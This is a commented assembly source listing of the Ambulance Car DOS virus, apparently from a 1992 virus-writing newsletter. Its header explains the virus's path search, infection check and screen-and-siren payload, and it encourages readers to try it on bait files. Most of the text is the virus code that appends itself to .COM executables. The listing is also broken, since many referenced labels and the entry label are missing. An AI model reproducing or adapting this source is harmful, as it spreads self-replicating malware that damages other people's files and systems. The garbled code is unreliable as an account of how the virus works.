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;REDCROSS/AMBULANCE CAR VIRUS for Crypt Newsletter #10, edited by Urnst Kouch
;December 1992
;Originally supplied as a Sourcer disassembly in a Scandinavian virus mag
;published by "Youth Against McAfee (YAM)", this AMBULANCE specimen was
;generated in its raw form by "Natas Kaupas." Hold that up to your mirror
;and it spells Satan. Whatever, "Natas/Satan" has also supplied us with the
;MINDLESS/FamR series of viruses for you trivia buffs. The Crypt Newsletter
;is obliged to him, wherever he is, for these interesting programs.
;In any case, while helpful, the original disassembly had diminished
;value, being completely uncommented. It did, however, assemble
;under TASM into an actual working copy of the virus, which
;appears to be the AMBULANCE CAR B strain.
;Ambulance Car remains an interesting virus, packed with enough features
;so that it can still find its target files, .COM executables, wherever
;they might be lurking on a system.
;Principally, this revolves around the virus searching the path string set
;in the environment. If no path exists, the virus defaults to the
;current directory. In both cases, the virus may infect up to two files
;anywhere on the path per pass. Most times it will infect only one.
;Sometimes it will not budge at all.
;Once it's found a file, Ambulance checks it for the 0E9h byte at
;the beginning. If it doesn't find it, the virus assumes the file is
;uninfected and immediately tries to complete the infection. If
;it does find the byte, it continues reading from there to confirm
;the viral sequence. If this is a coincidence and the complete sequence
;is not there, the virus will infect the file anyway.
;Randomly, the virus will activate and run the Ambulance across the bottom
;of your screen after a round of infection. Because of the path search
;Ambulance can easily find .COM executables on a sizeable disk at a time
;when there are less and less of these to be seen. Unfortunately, for a
;direct-action virus, the disk activity is noticeable with the caveats:
;on a fast machine, perhaps not; or in front of an average user, perhaps not.
;You never know how a user will react when dealing with viruses.
;You can easily experiment with this version on your machine by commenting
;out the path statement in your AUTOEXEC.BAT. This will restrict the
;virus to a test directory where it can be used to infect bait files
;until the Ambulance effect is seen.
;Ambulance Car is detected by "rules-based" anti-virus sentries like
;PCRx (reviewed in this issue), but keep in mind this type of
;protection is not flawless. Accidents can happen. Most current scanners
;easily detect this variant of Ambulance, although
;some cannot disinfect files once they are parasitized.
data_1e equ 0Ch
data_2e equ 49h
data_3e equ 6Ch
psp_envirn_seg equ 2Ch
data_21e equ 0C80h
virus segment byte public
assume cs:virus, ds:virus
org 100h
redcross proc far ;main flow control procedure for Ambulance
;Car virus
jmp short virstart
data_5 dw 4890h ; Data table
data_7 dw 6C65h ; Data table
db 6Ch, 6Fh, 20h, 2Dh, 20h
copyright db 'Copyright S & S Enterprises, 198';whoah, how'd Solomon's
db '8' ;stamp get in here? ;-]
db 0Ah, 0Dh, 24h, 1Ah,0B4h, 09h
db 0BAh, 03h, 01h,0CDh, 21h,0CDh
db 20h
db 0E8h, 01h, 00h
add [bp-7Fh],bx
out dx,al ; port 0, channel 0
add ax,[bx+di]
call check_infect ; do path search, infect file
call check_infect ; ditto, sometimes, sometimes not
call sound_fury ; do we do AMBULANCE effect? Check!
lea bx,[si+419h]
mov di,100h
mov al,[bx]
mov [di],al
mov ax,[bx+1]
mov [di+1],ax
jmp di ; Register jump
retn ; handoff to host
redcross endp
check_infect proc near ; path search for Ambulance
call loadpath ; Car
mov al,byte ptr data_19[si]
or al,al
jz exit ; No path/no files? Git!
lea bx,[si+40Fh]
inc word ptr [bx]
lea dx,[si+428h] ; load effective address
mov ax,3D02h
int 21h ; open found file by loadpath read/write
; with handle
mov word ptr ds:[417h][si],ax ;ax contains handle
mov bx,word ptr ds:[417h][si]
mov cx,3
lea dx,[si+414h] ; load address of buffer
mov ah,3Fh ; to read first three bytes into.
int 21h ; Read the bytes . . .
; bx points to file handle.
mov al,byte ptr ds:[414h][si]
cmp al,0E9h ; compare with 0E9h
jne infect ; if not equal, assume virus not here - infect
mov dx,word ptr ds:[415h][si]
mov bx,word ptr ds:[417h][si]
add dx,3
xor cx,cx ; zero register
mov ax,4200h
int 21h ; point to beginning of file, again
; bx contains the handle
mov bx,word ptr ds:[417h][si]
mov cx,6
lea dx,[si+41Ch] ; load effective address
mov ah,3Fh ; and read the first 6 bytes
int 21h ; this time
; ds:dx points to buffer
mov ax,data_13[si]
mov bx,data_14[si]
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; compare with data copied above
jne infect ; jump if not equal to infect
cmp bx,data_5[si]
jne infect ; jump if not equal
cmp cx,data_7[si]
je close ; finally, if we get a match we know
infect: ; we're here, so go to close up
mov bx,word ptr ds:[417h][si]
xor cx,cx ; zero register
xor dx,dx ; zero register
mov ax,4202h
int 21h ; reset pointer to end of file
; bx contains file handle
sub ax,3
mov word ptr ds:[412h][si],ax
mov bx,word ptr ds:[417h][si]
mov ax,5700h ; bx points to name of file
int 21h ; get file date and time
; time returns in cx, date in dx
push cx ; push these onto the stack
push dx ; we'll need 'em later
mov bx,word ptr ds:[417h][si]
mov cx,319h
lea dx,[si+100h]
mov ah,40h ; write the virus to the end of
int 21h ; the file, identified in bx
; cx contains virus length for write
; so do it, yes, append virus
mov bx,word ptr ds:[417h][si]
mov cx,3
lea dx,[si+414h] ; load effective address
mov ah,40h ;
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
mov bx,word ptr ds:[417h][si]
xor cx,cx ; zero register
xor dx,dx ; zero register
mov ax,4200h
int 21h ; reset the pointer to start of file
; identified in bx
; cx,dx=offset
mov bx,word ptr ds:[417h][si]
mov cx,3
lea dx,[si+411h] ; load effective address
mov ah,40h ; and write the first three virus id
int 21h ; and jump bytes to the file
; now, just about finished
pop dx ; retrieve date
pop cx ; and time from stack
mov bx,word ptr ds:[417h][si]
mov ax,5701h ; restore file's date/time
int 21h
mov bx,word ptr ds:[417h][si]
mov ah,3Eh
int 21h ; close file
retn ; return to caller, maybe we'll
check_infect endp ; infect again, maybe not
loadpath proc near ; this procedure checks for the
mov ax,ds:psp_envirn_seg ; existence of the ASCII path string in the
mov es,ax ; environment block of the program
push ds ; segment prefix (in this case psp_envirn_seg)
mov ax,40h ; if it exists, Ambulance Car copies
mov ds,ax ; the entire string into a buffer by using
mov bp,ds:data_3e ; '/' and ';' as cues. The virus then
pop ds ; sets the DTA to a directory
test bp,3 ; found in the path and executes a simple
jz loc_8 ; file search. If unproductive, it
xor bx,bx ; recursively searches the path
loc_6: ; before defaulting to the current
mov ax,es:[bx] ; directory
cmp ax,4150h
jne loc_7
cmp word ptr es:[bx+2],4854h
je loc_9
inc bx
or ax,ax
jnz loc_6 ; jump if not zero
lea di,[si+428h]
jmp short loc_14
add bx,5
lea di,[si+428h] ; load effective address of buffer
mov al,es:[bx]
inc bx ; copy a byte from the path
or al,al
jz loc_13 ; jump if zero
cmp al,3Bh ; found a divider? ';'
je loc_12 ; jump if equal, continue copying path
mov [di],al
inc di
jmp short loc_11 ; loop around, continue copying
cmp byte ptr es:[bx],0
je loc_13
shr bp,1 ; Shift w/zeros fill
shr bp,1 ; Shift w/zeros fill
test bp,3
jnz loc_10 ; Jump if not zero
cmp byte ptr [di-1],5Ch ; compare with '\'
je loc_14 ; jump if equal
mov byte ptr [di],5Ch ; compare with '\'
inc di
push ds
pop es
mov data_16[si],di
mov ax,2E2Ah
stosw ; copy portion of path, store ax to es:[di]
mov ax,4F43h
stosw ; Store ax to es:[di]
mov ax,4Dh
stosw ; Store ax to es:[di]
push es
mov ah,2Fh
int 21h ; get current DTA
; move it into es:bx
mov ax,es
mov data_17[si],ax
mov data_18[si],bx
pop es
lea dx,[si+478h] ; address of filemask
mov ah,1Ah
int 21h ; set the DTA to first dir in path
; disk xfer area, ds:dx
lea dx,[si+428h] ; load effective address
xor cx,cx ; zero register
mov ah,4Eh ; find first file
int 21h
jnc loc_15 ; jump if carry = 0
xor ax,ax
mov data_19[si],ax
jmp short loc_18
push ds
mov ax,40h
mov ds,ax
ror bp,1
xor bp,ds:data_3e
pop ds
test bp,7
jz loc_16 ; Jump if zero
mov ah,4Fh
int 21h
; find next file
jnc loc_15 ; jump if carry = 0
mov di,data_16[si]
lea bx,[si+496h]
mov al,[bx]
inc bx
stosb ; Store al to es:[di]
or al,al
jnz loc_17 ; Jump if not zero
mov bx,data_18[si]
mov ax,data_17[si]
push ds
mov ds,ax
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area), ds:dx
pop ds
retn ; return to check_infect
loadpath endp
sound_fury proc near ;sets up Ambulance Car effect, but
push es ; other than that, I have no idea
mov ax,word ptr ds:[40Fh][si] ; subroutines and procs from
and ax,7 ; here on down manage the
cmp ax,6 ; Ambulance Car graphic and
jne loc_19 ; siren effect
mov ax,40h
mov es,ax
mov ax,es:data_1e
or ax,ax
jnz loc_19 ; <= comment this out and you'll
inc word ptr es:data_1e ; get a corrupted version of the
call sub_5 ; Car effect everytime the virus
loc_19: ; executes. If you fiddle around
pop es ; with it enough you'll eventually
retn ; get the strain known as RedX-Any,
sound_fury endp ; for RedCross anytime.
sub_5 proc near
push ds
mov di,0B800h
mov ax,40h
mov ds,ax
mov al,ds:data_2e
cmp al,7
jne loc_20
mov di,0B000h
mov es,di
pop ds
mov bp,0FFF0h
mov dx,0
mov cx,10h
call sub_8
inc dx
loop locloop_22 ; Loop if cx > 0
call sub_7
call sub_9
inc bp
cmp bp,50h
jne loc_21 ; Jump if not equal
call sub_6
push ds
pop es
sub_5 endp
sub_6 proc near ; cycles speaker on for siren
in al,61h ; port 61h, 8255 port B, read
and al,0FCh
out 61h,al ; port 61h, 8255 B - spkr, etc
; al = 0, disable parity
sub_6 endp
sub_7 proc near ; more speaker stuff
mov dx,7D0h
test bp,4
jz loc_23
mov dx,0BB8h
in al,61h ; port 61h, 8255 port B, read
test al,3
jnz loc_24
or al,3
out 61h,al ; port 61h, 8255 B - spkr, etc
mov al,0B6h
out 43h,al ; port 43h, 8253 wrt timr mode
mov ax,dx
out 42h,al ; port 42h, 8253 timer 2 spkr
mov al,ah
out 42h,al ; port 42h, 8253 timer 2 spkr
sub_7 endp
sub_8 proc near
push cx
push dx
lea bx,[si+3BFh] ; Load effective addr
add bx,dx
add dx,bp
or dx,dx ; Zero ?
js loc_27 ; Jump if sign=1
cmp dx,50h
jae loc_27 ; Jump if above or =
mov di,data_21e
add di,dx
add di,dx
sub dx,bp
mov cx,5
mov ah,7
mov al,[bx]
sub al,7
add al,cl
sub al,dl
cmp cx,5
jne loc_26 ; Jump if not equal
mov ah,0Fh
test bp,3
jz loc_26 ; Jump if zero
mov al,20h ; ' '
stosw ; Store ax to es:[di]
add bx,10h
add di,9Eh
loop locloop_25 ; Loop if cx > 0
pop dx
pop cx
sub_8 endp
sub_9 proc near
push ds
mov ax,40h
mov ds,ax
mov ax,ds:data_3e
cmp ax,ds:data_3e
je loc_29 ; Jump if equal
pop ds
sub_9 endp
db 22h, 23h, 24h, 25h
db 26h, 27h, 28h, 29h, 66h, 87h
db 3Bh, 2Dh, 2Eh, 2Fh, 30h, 31h
db 23h,0E0h,0E1h,0E2h,0E3h,0E4h
db 0E5h
data_8 dw 0E7E6h ; Data table (indexed access)
db 0E7h
data_9 dw 0EAE9h ; Data table (indexed access)
data_10 db 0EBh ; Data table (indexed access)
data_11 dw 3130h ; Data table (indexed access)
data_12 dw 2432h ; Data table (indexed access)
db 0E0h,0E1h,0E2h
data_13 dw 0E8E3h ; Data table (indexed access)
data_14 dw 0EA2Ah ; Data table (indexed access)
data_15 dw 0E8E7h ; Data table (indexed access)
data_16 dw 2FE9h ; Data table (indexed access)
data_17 dw 6D30h ; Data table (indexed access)
data_18 dw 3332h ; Data table (indexed access)
data_19 dw 0E125h ; Data table (indexed access)
db 0E2h,0E3h,0E4h,0E5h,0E7h,0E7h
db 0E8h,0E9h,0EAh,0EBh,0ECh,0EDh
db 0EEh,0EFh, 26h,0E6h,0E7h, 29h
db 59h, 5Ah, 2Ch,0ECh,0EDh,0EEh
db 0EFh,0F0h, 32h, 62h, 34h,0F4h
db 09h, 00h,0E9h, 36h, 00h,0EBh
db 2Eh, 90h, 05h, 00h,0EBh, 2Eh
db 90h
virus ends
end start